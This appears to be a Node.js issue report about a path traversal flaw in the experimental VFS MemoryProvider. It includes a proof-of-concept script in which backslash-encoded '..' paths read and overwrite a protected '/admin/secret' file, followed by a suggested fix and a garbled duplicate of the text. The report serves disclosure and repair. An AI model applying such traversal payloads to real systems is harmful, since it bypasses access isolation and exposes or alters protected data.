Environment
- Node.js: v27.0.0-nightly20260625c5635b82c9
- Flag:
--experimental-vfs
- OS: Linux
Description
MemoryProvider#normalizePath() in lib/internal/vfs/providers/memory.js converts backslashes to forward slashes before calling pathPosix.normalize(). This allows .. traversal via backslash-encoded paths, bypassing directory isolation within the VFS virtual tree.
Root cause (lib/internal/vfs/providers/memory.js):
let normalized = StringPrototypeReplaceAll(path, '\\', '/');
return pathPosix.normalize(normalized); // resolves .. after backslash→/ conversion
Reproducer
// node --experimental-vfs poc.js
const vfs = require('node:vfs');
const fs = vfs.create(new vfs.MemoryProvider());
fs.mkdirSync('/admin');
fs.writeFileSync('/admin/secret', 'CONFIDENTIAL');
fs.mkdirSync('/user/data', { recursive: true });
fs.writeFileSync('/user/data/public.txt', 'public');
// Read traversal: /user/data\..\..\admin/secret → /admin/secret
console.log(fs.readFileSync('/user/data\\..\\..\\admin/secret', 'utf8'));
// Output: CONFIDENTIAL
// Write traversal
fs.writeFileSync('/user/data\\..\\..\\admin/secret', 'OVERWRITTEN');
console.log(fs.readFileSync('/admin/secret', 'utf8'));
// Output: OVERWRITTENExpected behavior
Paths containing backslashes should either be rejected or treated as literal filename characters (as Linux does), not converted to path separators.
Suggested fix
Remove the backslash-to-slash conversion in #normalizePath(), or reject paths containing backslashes with an EINVAL error.
Environment
--experimental-vfsDescription
MemoryProvider#normalizePath()inlib/internal/vfs/providers/memory.jsconverts backslashes to forward slashes before callingpathPosix.normalize(). This allows..traversal via backslash-encoded paths, bypassing directory isolation within the VFS virtual tree.Root cause (
lib/internal/vfs/providers/memory.js):Reproducer
Expected behavior
Paths containing backslashes should either be rejected or treated as literal filename characters (as Linux does), not converted to path separators.
Suggested fix
Remove the backslash-to-slash conversion in
#normalizePath(), or reject paths containing backslashes with anEINVALerror.